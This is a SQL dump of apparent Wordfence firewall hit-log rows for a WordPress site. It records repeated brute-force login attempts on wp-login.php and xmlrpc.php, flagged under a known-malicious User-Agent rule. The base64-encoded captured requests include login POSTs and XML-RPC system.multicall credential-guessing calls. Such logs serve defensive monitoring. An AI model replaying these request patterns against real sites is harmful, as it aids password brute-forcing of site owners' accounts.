(25,0.000000,1691938529.391193,'\0\0\0\0\0\0\0\0\0\0*t',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','loginFailValidUsername',NULL,NULL),
(26,1691938679.301200,1691938679.030923,'\0\0\0\0\0\0\0\0\0\0£C',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(27,1691938681.323000,1691938681.046887,'\0\0\0\0\0\0\0\0\0\0£C',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwNApDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(28,1691938683.569600,1691938683.305184,'\0\0\0\0\0\0\0\0\0\0£C',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDgwCkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(29,1691938855.011800,1691938854.753433,'\0\0\0\0\0\0\0\0\0\0gH',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(30,1691938856.899200,1691938856.630382,'\0\0\0\0\0\0\0\0\0\0gH',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwMgpDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(31,1691938858.940000,1691938858.686551,'\0\0\0\0\0\0\0\0\0\0gH',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc1CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(32,0.000000,1691938972.322817,'\0\0\0\0\0\0\0\0\0\0s',0,503,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),
(33,1691939061.182600,1691939060.425473,'\0\0\0\0\0\0\0\0\0\0]r',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(34,1691939063.648900,1691939062.906717,'\0\0\0\0\0\0\0\0\0\0]r',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwMQpDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(35,1691939066.327600,1691939065.627070,'\0\0\0\0\0\0\0\0\0\0]r',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc1CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(36,1691939240.005100,1691939239.408999,'\0\0\0\0\0\0\0\0\0\0,',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(37,1691939242.177000,1691939241.665836,'\0\0\0\0\0\0\0\0\0\0,',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDk3CkNvbm5lY3Rpb246IGNsb3NlCgpsb2c9JTVCcmVkYWN0ZWQlNUQmcHdkPSU1QnJlZGFjdGVkJTVEJndwLXN1Ym1pdD1Mb2crSW4mcmVkaXJlY3RfdG89aHR0cHMlM0ElMkYlMkZnc3cyMDIzLmNvbSUyRndwLWFkbWluJTJGJnRlc3Rjb29raWU9MQ==\"}'),
(38,1691939244.619200,1691939244.136603,'\0\0\0\0\0\0\0\0\0\0,',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDczCkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(39,0.000000,1691939346.159221,'\0\0\0\0\0\0\0\0\0\0՘',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','loginFailValidUsername',NULL,NULL),
(40,1691939603.417100,1691939602.856399,'\0\0\0\0\0\0\0\0\0\0|',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(41,1691939607.969000,1691939607.221780,'\0\0\0\0\0\0\0\0\0\0|',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDk3CkNvbm5lY3Rpb246IGNsb3NlCgpsb2c9JTVCcmVkYWN0ZWQlNUQmcHdkPSU1QnJlZGFjdGVkJTVEJndwLXN1Ym1pdD1Mb2crSW4mcmVkaXJlY3RfdG89aHR0cHMlM0ElMkYlMkZnc3cyMDIzLmNvbSUyRndwLWFkbWluJTJGJnRlc3Rjb29raWU9MQ==\"}'),
(42,1691939613.815700,1691939613.294743,'\0\0\0\0\0\0\0\0\0\0|',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDczCkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(43,0.000000,1691939724.243120,'\0\0\0\0\0\0\0\0\0\0#',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36','loginFailValidUsername',NULL,NULL),
(44,1691939724.721700,1691939724.243103,'\0\0\0\0\0\0\0\0\0\0PPԪ',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious 